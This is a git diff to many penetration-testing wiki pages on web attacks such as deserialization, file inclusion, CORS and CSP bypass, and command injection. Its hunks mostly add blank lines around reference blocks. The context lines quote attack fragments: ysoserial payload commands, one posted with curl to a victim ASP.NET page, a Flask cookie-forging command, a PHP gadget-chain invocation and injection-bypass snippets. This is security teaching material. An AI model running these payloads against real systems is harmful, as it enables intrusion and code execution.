diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md index f79ea35d5..3c6eb967f 100644 --- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md @@ -17,6 +17,7 @@ process.on("exit", function () { }) ``` + {{#ref}} https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36 {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/flask.md b/src/network-services-pentesting/pentesting-web/flask.md index 968b3fb85..94842c1b3 100644 --- a/src/network-services-pentesting/pentesting-web/flask.md +++ b/src/network-services-pentesting/pentesting-web/flask.md @@ -26,6 +26,7 @@ The cookie is also signed using a password Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys. + {{#ref}} https://pypi.org/project/flask-unsign/ {{#endref}} @@ -62,6 +63,7 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy Command line tool to brute-force websites using cookies crafted with flask-unsign. + {{#ref}} https://github.com/Tagvi/ripsession {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/graphql.md b/src/network-services-pentesting/pentesting-web/graphql.md index 7a7e4268e..03d3347e5 100644 --- a/src/network-services-pentesting/pentesting-web/graphql.md +++ b/src/network-services-pentesting/pentesting-web/graphql.md @@ -441,6 +441,7 @@ file:* query If you don't know what CSRF is read the following page: + {{#ref}} ../../pentesting-web/csrf-cross-site-request-forgery.md {{#endref}} 
@@ -475,6 +476,7 @@ Similar to CRSF vulnerabilities abusing graphQL it's also possible to perform a For more information check: + {{#ref}} ../../pentesting-web/websocket-attacks.md {{#endref}} @@ -698,6 +700,7 @@ const protectedSchema = applyMiddleware(schema, ...protect()); ### Automatic Tests + {{#ref}} https://graphql-dashboard.herokuapp.com/ {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md b/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md index 7d8fddfac..199b41d45 100644 --- a/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md +++ b/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md @@ -45,6 +45,7 @@ ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" | ``` For an in-depth explanation on abusing ASP.NET ViewState read: + {{#ref}} ../../pentesting-web/deserialization/exploiting-__viewstate-parameter.md {{#endref}} @@ -176,6 +177,7 @@ proc where parent_process_name="w3wp.exe" and process_name in ("cmd.exe","powers ## Related tricks * IIS post-exploitation & web.config abuse: + {{#ref}} ../../network-services-pentesting/pentesting-web/iis-internet-information-services.md {{#endref}} @@ -188,4 +190,4 @@ proc where parent_process_name="w3wp.exe" and process_name in ("cmd.exe","powers - [Unit42 – Project AK47 / SharePoint Exploitation & Ransomware Activity](https://unit42.paloaltonetworks.com/ak47-activity-linked-to-sharepoint-vulnerabilities/) - [Microsoft Security Advisory – CVE-2025-53770 / 53771](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-53770) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/nextjs.md b/src/network-services-pentesting/pentesting-web/nextjs.md index 4a878b05f..699fef29f 100644 --- a/src/network-services-pentesting/pentesting-web/nextjs.md 
+++ b/src/network-services-pentesting/pentesting-web/nextjs.md @@ -827,6 +827,7 @@ export const config = { Attackers can craft malicious websites that make requests to your API, potentially abusing functionalities like data retrieval, data manipulation, or triggering unwanted actions on behalf of authenticated users. + {{#ref}} ../../pentesting-web/cors-bypass.md {{#endref}} @@ -1270,4 +1271,3 @@ const HeavyComponent = dynamic(() => import("../components/HeavyComponent"), { {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/nginx.md b/src/network-services-pentesting/pentesting-web/nginx.md index 4bedf3b27..0be085fe7 100644 --- a/src/network-services-pentesting/pentesting-web/nginx.md +++ b/src/network-services-pentesting/pentesting-web/nginx.md @@ -68,6 +68,7 @@ location = /admin/ { } ``` + {{#ref}} ../../pentesting-web/proxy-waf-protections-bypass.md {{#endref}} @@ -354,4 +355,3 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md index 220672ab5..8e12431f6 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md @@ -169,6 +169,7 @@ readfile($page); Check: + {{#ref}} ../../../pentesting-web/file-inclusion/ {{#endref}} @@ -220,6 +221,7 @@ In the following scenario the **attacker made the server throw some big errors** Check ther page: + {{#ref}} php-ssrf.md {{#endref}} @@ -399,6 +401,7 @@ echo "$x ${Da}"; //Da Drums If in a page you can **create a new object of an arbitrary class** you might be able to obtain RCE, check the following page to learn how: + {{#ref}} php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md {{#endref}} 
diff --git a/src/network-services-pentesting/pentesting-web/python.md b/src/network-services-pentesting/pentesting-web/python.md index 626351c45..bb1996d65 100644 --- a/src/network-services-pentesting/pentesting-web/python.md +++ b/src/network-services-pentesting/pentesting-web/python.md @@ -12,14 +12,17 @@ test a possible **code execution**, using the function _str()_: ### Tricks + {{#ref}} ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md {{#endref}} + {{#ref}} ../../pentesting-web/ssti-server-side-template-injection/README.md {{#endref}} + {{#ref}} ../../pentesting-web/deserialization/README.md {{#endref}} @@ -27,4 +30,3 @@ test a possible **code execution**, using the function _str()_: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/special-http-headers.md b/src/network-services-pentesting/pentesting-web/special-http-headers.md index 554e6487a..bd825fee0 100644 --- a/src/network-services-pentesting/pentesting-web/special-http-headers.md +++ b/src/network-services-pentesting/pentesting-web/special-http-headers.md @@ -39,6 +39,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b - `Connection: close, X-Forwarded-For` + {{#ref}} ../../pentesting-web/abusing-hop-by-hop-headers.md {{#endref}} @@ -48,6 +49,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b - `Content-Length: 30` - `Transfer-Encoding: chunked` + {{#ref}} ../../pentesting-web/http-request-smuggling/ {{#endref}} @@ -63,6 +65,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b - **`Age`** defines the times in seconds the object has been in the proxy cache. - **`Server-Timing: cdn-cache; desc=HIT`** also indicates that a resource was cached + {{#ref}} ../../pentesting-web/cache-deception/ {{#endref}} 
@@ -125,6 +128,7 @@ This means the file named "filename.jpg" is intended to be downloaded and saved. ### Content Security Policy (CSP) + {{#ref}} ../../pentesting-web/content-security-policy-csp-bypass/ {{#endref}} @@ -241,4 +245,3 @@ The headers reach the `exec` component unfiltered, resulting in remote command e {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/symphony.md b/src/network-services-pentesting/pentesting-web/symphony.md index b7846e423..deb6cb5fb 100644 --- a/src/network-services-pentesting/pentesting-web/symphony.md +++ b/src/network-services-pentesting/pentesting-web/symphony.md @@ -73,6 +73,7 @@ Symfony is one of the most widely-used PHP frameworks and regularly appears in a ### 5. Symfony 1 gadget chains (still found in legacy apps) * `phpggc symfony/1 system id` produces a Phar payload that triggers RCE when an unserialize() happens on classes such as `sfNamespacedParameterHolder`. Check file-upload endpoints and `phar://` wrappers. + {{#ref}} ../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md index b306fc680..b340a831d 100644 --- a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md +++ b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md @@ -44,6 +44,7 @@ Note that even if this was done for AWS machines, it could be done for any other For a better description of this process check: + {{#ref}} https://trickest.com/blog/cloudflare-bypass-discover-ip-addresses-aws/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/werkzeug.md b/src/network-services-pentesting/pentesting-web/werkzeug.md index aa9242640..30fb71e6b 100644 
--- a/src/network-services-pentesting/pentesting-web/werkzeug.md +++ b/src/network-services-pentesting/pentesting-web/werkzeug.md @@ -161,6 +161,7 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a ## Automated Exploitation + {{#ref}} https://github.com/Ruulian/wconsole_extractor {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md index 416a8b034..519327296 100644 --- a/src/network-services-pentesting/pentesting-web/wordpress.md +++ b/src/network-services-pentesting/pentesting-web/wordpress.md @@ -249,6 +249,7 @@ This is the response when it doesn't work: ## SSRF + {{#ref}} https://github.com/t0gu/quickpress/blob/master/core/requests.go {{#endref}} diff --git a/src/pentesting-web/account-takeover.md b/src/pentesting-web/account-takeover.md index 35ccfa25b..d8050b064 100644 --- a/src/pentesting-web/account-takeover.md +++ b/src/pentesting-web/account-takeover.md @@ -21,6 +21,7 @@ As explained in [**this talk**](https://www.youtube.com/watch?v=CiIyaZ3x49c), th For further details, refer to the document on Unicode Normalization: + {{#ref}} unicode-injection/unicode-normalization.md {{#endref}} @@ -39,6 +40,7 @@ Should the target system allow the **reset link to be reused**, efforts should b If the page contains **CORS misconfigurations** you might be able to **steal sensitive information** from the user to **takeover his account** or make him change auth information for the same purpose: + {{#ref}} cors-bypass.md {{#endref}} @@ -47,6 +49,7 @@ cors-bypass.md If the page is vulnerable to CSRF you might be able to make the **user modify his password**, email or authentication so you can then access it: + {{#ref}} csrf-cross-site-request-forgery.md {{#endref}} 
@@ -55,6 +58,7 @@ csrf-cross-site-request-forgery.md If you find a XSS in application you might be able to steal cookies, local storage, or info from the web page that could allow you takeover the account: + {{#ref}} xss-cross-site-scripting/ {{#endref}} @@ -63,12 +67,14 @@ xss-cross-site-scripting/ If you find a limited XSS or a subdomain take over, you could play with the cookies (fixating them for example) to try to compromise the victim account: + {{#ref}} hacking-with-cookies/ {{#endref}} ## **Attacking Password Reset Mechanism** + {{#ref}} reset-password.md {{#endref}} @@ -79,6 +85,7 @@ If the authentication response could be **reduced to a simple boolean just try t ## OAuth to Account takeover + {{#ref}} oauth-to-account-takeover.md {{#endref}} @@ -129,4 +136,3 @@ With the new login, although different cookies might be generated the old ones b {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/README.md b/src/pentesting-web/browser-extension-pentesting-methodology/README.md index 33a6452bd..ade731991 100644 --- a/src/pentesting-web/browser-extension-pentesting-methodology/README.md +++ b/src/pentesting-web/browser-extension-pentesting-methodology/README.md @@ -276,6 +276,7 @@ As browser extensions can be so **privileged**, a malicious one or one being com Check how these settings work and how they could get abused in: + {{#ref}} browext-permissions-and-host_permissions.md {{#endref}} @@ -292,6 +293,7 @@ script-src 'self'; object-src 'self'; For more info about CSP and potential bypasses check: + {{#ref}} ../content-security-policy-csp-bypass/ {{#endref}} @@ -335,6 +337,7 @@ Although, if the `manifest.json` parameter **`use_dynamic_url`** is used, this * Being allowed to access these pages make these pages **potentially vulnerable ClickJacking**: + {{#ref}} browext-clickjacking.md {{#endref}} 
@@ -496,6 +499,7 @@ A secure Post Message communication should check the authenticity of the receive The previous checks, even if performed, could be vulnerable, so check in the following page **potential Post Message bypasses**: + {{#ref}} ../postmessage-vulnerabilities/ {{#endref}} @@ -504,6 +508,7 @@ The previous checks, even if performed, could be vulnerable, so check in the fol Another possible way of communication might be through **Iframe URLs**, you can find an example in: + {{#ref}} browext-xss-example.md {{#endref}} @@ -514,6 +519,7 @@ This isn't "exactly" a communication way, but the **web and the content script w You can also find an example of a **DOM based XSS to compromise a browser extension** in: + {{#ref}} browext-xss-example.md {{#endref}} @@ -757,4 +763,3 @@ Project Neto is a Python 3 package conceived to analyse and unravel hidden featu {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md index ea330373d..9f8f4752e 100644 --- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md +++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md @@ -7,6 +7,7 @@ This page is going to abuse a ClickJacking vulnerability in a Browser extension.\ If you don't know what ClickJacking is check: + {{#ref}} ../clickjacking.md {{#endref}} @@ -89,6 +90,7 @@ A [**blog post about a ClickJacking in metamask can be found here**](https://slo Check the following page to check how a **XSS** in a browser extension was chained with a **ClickJacking** vulnerability: + {{#ref}} browext-xss-example.md {{#endref}} @@ -100,4 +102,3 @@ browext-xss-example.md {{#include ../../banners/hacktricks-training.md}} - 
diff --git a/src/pentesting-web/cache-deception/README.md b/src/pentesting-web/cache-deception/README.md index 8a555208c..f50ee304f 100644 --- a/src/pentesting-web/cache-deception/README.md +++ b/src/pentesting-web/cache-deception/README.md @@ -29,6 +29,7 @@ If you are thinking that the response is being stored in a cache, you could try You can find more options in: + {{#ref}} cache-poisoning-to-dos.md {{#endref}} @@ -77,6 +78,7 @@ _Note that this will poison a request to `/en?region=uk` not to `/en`_ ### Cache poisoning to DoS + {{#ref}} cache-poisoning-to-dos.md {{#endref}} @@ -105,6 +107,7 @@ Note that if the vulnerable cookie is very used by the users, regular requests w Check: + {{#ref}} cache-poisoning-via-url-discrepancies.md {{#endref}} @@ -115,6 +118,7 @@ cache-poisoning-via-url-discrepancies.md This is also explained better in: + {{#ref}} cache-poisoning-via-url-discrepancies.md {{#endref}} @@ -250,4 +254,3 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/captcha-bypass.md b/src/pentesting-web/captcha-bypass.md index c2f59772a..4c70d6064 100644 --- a/src/pentesting-web/captcha-bypass.md +++ b/src/pentesting-web/captcha-bypass.md 
@@ -32,6 +32,7 @@ To **bypass** the captcha during **server testing** and automate user input func [**CapSolver**](https://www.capsolver.com/?utm_source=google&utm_medium=ads&utm_campaign=scraping&utm_term=hacktricks&utm_content=captchabypass) is an AI-powered service that specializes in solving various types of captchas automatically, empowers data collection by helping developers easily overcome the captcha challenges encountered during Web Scraping. It supports captchas such as **reCAPTCHA V2, reCAPTCHA V3, DataDome, AWS Captcha, Geetest, and Cloudflare turnstile among others**. For developers, Capsolver offers API integration options detailed in [**documentation**](https://docs.capsolver.com/?utm_source=github&utm_medium=banner_github&utm_campaign=fcsrv)**,** facilitating the integration of captcha solving into applications. They also provide browser extensions for [Chrome](https://chromewebstore.google.com/detail/captcha-solver-auto-captc/pgojnojmmhpofjgdmaebadhbocahppod) and [Firefox](https://addons.mozilla.org/es/firefox/addon/capsolver-captcha-solver/), making it easy to use their service directly within a browser. Different pricing packages are available to accommodate varying needs, ensuring flexibility for users. + {{#ref}} https://www.capsolver.com/?utm_campaign=scraping&utm_content=captchabypass&utm_medium=ads&utm_source=google&utm_term=hacktricks {{#endref}} diff --git a/src/pentesting-web/client-side-template-injection-csti.md b/src/pentesting-web/client-side-template-injection-csti.md index dacf8a5f1..0d3944a1e 100644 --- a/src/pentesting-web/client-side-template-injection-csti.md +++ b/src/pentesting-web/client-side-template-injection-csti.md @@ -81,6 +81,7 @@ javascript:alert(1)%252f%252f..%252fcss-images ## **Brute-Force Detection List** + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt {{#endref}} 
diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 1eb7b3d9e..678e0772a 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -35,6 +35,7 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful If you are trying to execute **arbitrary commands inside a linux machine** you will be interested to read about this **Bypasses:** + {{#ref}} ../linux-hardening/bypass-bash-restrictions/ {{#endref}} @@ -125,6 +126,7 @@ powershell C:**2\n??e*d.*? # notepad #### Linux + {{#ref}} ../linux-hardening/bypass-bash-restrictions/ {{#endref}} @@ -157,6 +159,7 @@ Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an una ## Brute-Force Detection List + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt {{#endref}} diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md index ae5d26450..1103d2624 100644 --- a/src/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md @@ -119,6 +119,7 @@ Working payload: `"/>` #### self + 'unsafe-inline' via Iframes + {{#ref}} csp-bypass-self-+-unsafe-inline-with-iframes.md {{#endref}} @@ -409,6 +410,7 @@ Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin. ### Iframes JS execution + {{#ref}} ../xss-cross-site-scripting/iframes-in-xss-and-csp.md {{#endref}} @@ -522,6 +524,7 @@ You could also abuse this configuration to **load javascript code inserted insid Service workers **`importScripts`** function isn't limited by CSP: + {{#ref}} ../xss-cross-site-scripting/abusing-service-workers.md {{#endref}} 
@@ -705,6 +708,7 @@ setTimeout(function () { SOME is a technique that abuses an XSS (or highly limited XSS) **in an endpoint of a page** to **abuse** **other endpoints of the same origin.** This is done by loading the vulnerable endpoint from an attacker page and then refreshing the attacker page to the real endpoint in the same origin you want to abuse. This way the **vulnerable endpoint** can use the **`opener`** object in the **payload** to **access the DOM** of the **real endpoint to abuse**. For more information check: + {{#ref}} ../xss-cross-site-scripting/some-same-origin-method-execution.md {{#endref}} @@ -839,4 +843,3 @@ navigator.credentials.store( {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/cors-bypass.md b/src/pentesting-web/cors-bypass.md index d1e56ca3b..f304fad89 100644 --- a/src/pentesting-web/cors-bypass.md +++ b/src/pentesting-web/cors-bypass.md @@ -260,6 +260,7 @@ Access-Control-Allow-Credentials: true ### **Other funny URL tricks** + {{#ref}} ssrf-server-side-request-forgery/url-format-bypass.md {{#endref}} @@ -344,6 +345,7 @@ One way to bypass the `Access-Control-Allow-Origin` restriction is by requesting You can **bypass CORS checks** such as `e.origin === window.origin` by **creating an iframe** and **from it opening a new window**. More information in the following page: + {{#ref}} xss-cross-site-scripting/iframes-in-xss-and-csp.md {{#endref}} @@ -445,4 +447,3 @@ You can find more information about the previous bypass techniques and how to us {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/crlf-0d-0a.md b/src/pentesting-web/crlf-0d-0a.md index 4c896e899..add9b6765 100644 --- a/src/pentesting-web/crlf-0d-0a.md +++ b/src/pentesting-web/crlf-0d-0a.md 
@@ -84,6 +84,7 @@ http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:te Check more examples in: + {{#ref}} https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md {{#endref}} @@ -151,6 +152,7 @@ Afterward, a second request can be specified. This scenario typically involves [ Memcache is a **key-value store that uses a clear text protocol**. More info in: + {{#ref}} ../network-services-pentesting/11211-memcache/ {{#endref}} diff --git a/src/pentesting-web/csrf-cross-site-request-forgery.md b/src/pentesting-web/csrf-cross-site-request-forgery.md index 2b029b5a8..1b7dd7d04 100644 --- a/src/pentesting-web/csrf-cross-site-request-forgery.md +++ b/src/pentesting-web/csrf-cross-site-request-forgery.md @@ -160,6 +160,7 @@ This ensures the 'Referer' header is omitted, potentially bypassing validation c **Regexp bypasses** + {{#ref}} ssrf-server-side-request-forgery/url-format-bypass.md {{#endref}} @@ -689,4 +690,3 @@ with open(PASS_LIST, "r") as f: {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md index c9445898b..911bec500 100644 --- a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md +++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md @@ -237,6 +237,7 @@ Not all the ways to leak connectivity in HTML will be useful for Dangling Markup This is a **mix** between **dangling markup and XS-Leaks**. From one side the vulnerability allows to **inject HTML** (but not JS) in a page of the **same origin** of the one we will be attacking. On the other side we won't **attack** directly the page where we can inject HTML, but **another page**. + {{#ref}} ss-leaks.md {{#endref}} 
@@ -245,12 +246,14 @@ ss-leaks.md XS-Search are oriented to **exfiltrate cross-origin information** abusing **side channel attacks**.Therefore, it's a different technique than Dangling Markup, however, some of the techniques abuse the inclusion of HTML tags (with and without JS execution), like [**CSS Injection**](../xs-search/index.html#css-injection) or [**Lazy Load Images**](../xs-search/index.html#image-lazy-loading)**.** + {{#ref}} ../xs-search/ {{#endref}} ## Brute-Force Detection List + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt {{#endref}} diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md index 9cf3f8d08..b6c69d179 100644 --- a/src/pentesting-web/deserialization/README.md +++ b/src/pentesting-web/deserialization/README.md @@ -98,6 +98,7 @@ You can read an explained **PHP example here**: [https://www.notsosecure.com/rem You could abuse the PHP autoload functionality to load arbitrary php files and more: + {{#ref}} php-deserialization-+-autoload-classes.md {{#endref}} @@ -188,6 +189,7 @@ So, if you can, check the `phpinfo()` of the server and **search on the internet If you have found a LFI that is just reading the file and not executing the php code inside of it, for example using functions like _**file_get_contents(), fopen(), file() or file_exists(), md5_file(), filemtime() or filesize()**_**.** You can try to abuse a **deserialization** occurring when **reading** a **file** using the **phar** protocol.\ For more information read the following post: + {{#ref}} ../file-inclusion/phar-deserialization.md {{#endref}} @@ -211,6 +213,7 @@ Before checking the bypass technique, try using `print(base64.b64encode(pickle.d For more information about escaping from **pickle jails** check: + {{#ref}} ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/ {{#endref}} 
@@ -219,12 +222,14 @@ For more information about escaping from **pickle jails** check: The following page present the technique to **abuse an unsafe deserialization in yamls** python libraries and finishes with a tool that can be used to generate RCE deserialization payload for **Pickle, PyYAML, jsonpickle and ruamel.yaml**: + {{#ref}} python-yaml-deserialization.md {{#endref}} ### Class Pollution (Python Prototype Pollution) + {{#ref}} ../../generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md {{#endref}} @@ -266,6 +271,7 @@ test_then() If you want to learn about this technique **take a look to the following tutorial**: + {{#ref}} nodejs-proto-prototype-pollution/ {{#endref}} @@ -694,6 +700,7 @@ ObjectInputFilter.Config.setSerialFilter(filter); Find whats is **JNDI Injection, how to abuse it via RMI, CORBA & LDAP and how to exploit log4shell** (and example of this vuln) in the following page: + {{#ref}} jndi-java-naming-and-directory-interface-and-log4shell.md {{#endref}} @@ -1085,4 +1092,3 @@ Using the arbitrary file write vulnerability, the attacker writes the crafted ca {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md index 6aa114c8f..dcda7f694 100644 --- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md +++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md @@ -265,10 +265,7 @@ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \ | curl -d "__VIEWSTATE=$(cat -)" http://victim/portal/loginpage.aspx ``` -Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or replace the keys immediately. {{#ref}} - - -{{#endref}} +Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or replace the keys immediately. ## References 
@@ -289,4 +286,3 @@ Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md index 4842959a8..f31e4d0e9 100644 --- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md +++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md @@ -225,6 +225,7 @@ customer.__proto__.toString = ()=>{alert("polluted")} ### Proto Pollution to RCE + {{#ref}} prototype-pollution-to-rce.md {{#endref}} @@ -235,6 +236,7 @@ Other payloads: ## Client-side prototype pollution to XSS + {{#ref}} client-side-prototype-pollution.md {{#endref}} diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md index 8aa38e9a1..328bb0e93 100644 --- a/src/pentesting-web/file-inclusion/README.md +++ b/src/pentesting-web/file-inclusion/README.md @@ -23,6 +23,7 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../ **Mixing several \*nix LFI lists and adding more paths I have created this one:** + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt {{#endref}} @@ -36,6 +37,7 @@ A list that uses several techniques to find the file /etc/password (to check if Merge of different wordlists: + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt {{#endref}} @@ -414,6 +416,7 @@ For a detailed understanding of exploiting deserialization vulnerabilities in th [Phar Deserialization Exploitation Guide](phar-deserialization.md) + {{#ref}} phar-deserialization.md {{#endref}} 
@@ -645,6 +648,7 @@ NOTE: the payload is "" This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file. + {{#ref}} lfi2rce-via-php-filters.md {{#endref}} @@ -653,6 +657,7 @@ lfi2rce-via-php-filters.md **Upload** a file that will be stored as **temporary** in `/tmp`, then in the **same request,** trigger a **segmentation fault**, and then the **temporary file won't be deleted** and you can search for it. + {{#ref}} lfi2rce-via-segmentation-fault.md {{#endref}} @@ -661,6 +666,7 @@ lfi2rce-via-segmentation-fault.md If you found a **Local File Inclusion** and **Nginx** is running in front of PHP you might be able to obtain RCE with the following technique: + {{#ref}} lfi2rce-via-nginx-temp-files.md {{#endref}} @@ -669,6 +675,7 @@ lfi2rce-via-nginx-temp-files.md If you found a **Local File Inclusion** even if you **don't have a session** and `session.auto_start` is `Off`. If you provide the **`PHP_SESSION_UPLOAD_PROGRESS`** in **multipart POST** data, PHP will **enable the session for you**. You could abuse this to get RCE: + {{#ref}} via-php_session_upload_progress.md {{#endref}} @@ -677,6 +684,7 @@ via-php_session_upload_progress.md If you found a **Local File Inclusion** and and the server is running in **Windows** you might get RCE: + {{#ref}} lfi2rce-via-temp-file-uploads.md {{#endref}} @@ -704,6 +712,7 @@ Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php If you found a **Local File Inclusion** and a file exposing **phpinfo()** with file_uploads = on you can get RCE: + {{#ref}} lfi2rce-via-phpinfo.md {{#endref}} 
@@ -712,6 +721,7 @@ lfi2rce-via-phpinfo.md If you found a **Local File Inclusion** and you **can exfiltrate the path** of the temp file BUT the **server** is **checking** if the **file to be included has PHP marks**, you can try to **bypass that check** with this **Race Condition**: + {{#ref}} lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md {{#endref}} @@ -720,6 +730,7 @@ lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md If you can abuse the LFI to **upload temporary files** and make the server **hang** the PHP execution, you could then **brute force filenames during hours** to find the temporary file: + {{#ref}} lfi2rce-via-eternal-waiting.md {{#endref}} diff --git a/src/pentesting-web/file-inclusion/phar-deserialization.md b/src/pentesting-web/file-inclusion/phar-deserialization.md index 9a45d0c5e..6e27e1a3c 100644 --- a/src/pentesting-web/file-inclusion/phar-deserialization.md +++ b/src/pentesting-web/file-inclusion/phar-deserialization.md @@ -67,6 +67,7 @@ php vuln.php ### References + {{#ref}} https://blog.ripstech.com/2018/new-php-exploitation-technique/ {{#endref}} diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md index 0b63f0a41..b0e8b39ac 100644 --- a/src/pentesting-web/file-upload/README.md +++ b/src/pentesting-web/file-upload/README.md @@ -199,6 +199,7 @@ Here’s a top 10 list of things that you can achieve by uploading (from [here]( #### Burp Extension + {{#ref}} https://github.com/portswigger/upload-scanner {{#endref}} diff --git a/src/pentesting-web/hacking-jwt-json-web-tokens.md b/src/pentesting-web/hacking-jwt-json-web-tokens.md index 6f47ad254..ed585238c 100644 --- a/src/pentesting-web/hacking-jwt-json-web-tokens.md +++ b/src/pentesting-web/hacking-jwt-json-web-tokens.md 
